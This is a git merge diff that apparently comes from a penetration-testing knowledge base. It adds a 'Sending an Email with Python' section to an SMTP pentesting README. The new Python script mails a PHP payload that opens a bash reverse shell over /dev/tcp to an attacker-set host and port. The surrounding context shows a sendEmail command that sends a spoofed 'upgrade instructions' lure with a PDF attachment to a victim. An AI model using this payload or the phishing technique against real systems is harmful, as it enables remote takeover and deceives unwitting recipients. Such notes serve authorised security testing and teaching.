Merge pull request #102 from mr-wacker/master

Adding a new note "Sending an Email with Python" in pentesting/pentesting-smtp

pentesting/pentesting-smtp/README.md

@@ -153,7 +153,7 @@ Nmap: nmap --script smtp-enum-users <IP>
 
 ## [Commands](smtp-commands.md)
 
-## Send Email from linux console
+### Sending an Email from linux console
 
 ```text
 root@kali:~# sendEmail -t itdept@victim.com -f techsupport@bestcomputers.com -s 192.168.8.131 -u Important Upgrade Instructions -a /tmp/BestComputers-UpgradeInstructions.pdf
@@ -171,6 +171,54 @@ Sincerely,
 
 From: [https://www.offensive-security.com/metasploit-unleashed/client-side-exploits/](https://www.offensive-security.com/metasploit-unleashed/client-side-exploits/)
 
+### Sending an Email with Python
+
+Here's alternative way to send an email with python script
+
+```python
+from email.mime.multipart import MIMEMultipart
+from email.mime.text import MIMEText
+import smtplib
+import sys
+
+lhost = "127.0.0.1"
+lport = 443
+rhost = "192.168.1.1"
+rport = 25 # 489,587
+
+# create message object instance
+msg = MIMEMultipart()
+
+# setup the parameters of the message
+password = "" 
+msg['From'] = "attacker@local"
+msg['To'] = "victim@local"
+msg['Subject'] = "This is not a drill!"
+
+# payload 
+message = ("<?php system('bash -i >& /dev/tcp/%s/%d 0>&1'); ?>" % (lhost,lport))
+
+print("[*] Payload is generated : %s" % message)
+
+msg.attach(MIMEText(message, 'plain'))
+server = smtplib.SMTP(host=rhost,port=rport)
+
+if server.noop()[0] != 250:
+    print("[-]Connection Error")
+    exit()
+    
+server.starttls()
+
+# Uncomment if log-in with authencation
+# server.login(msg['From'], password)
+
+server.sendmail(msg['From'], msg['To'], msg.as_string())
+server.quit()
+
+print("[***]successfully sent email to %s:" % (msg['To']))
+```
+
+
 ## Mail Spoofing
 
 Most of this section was extracted from the book **Network Security Assessment 3rd Edition**.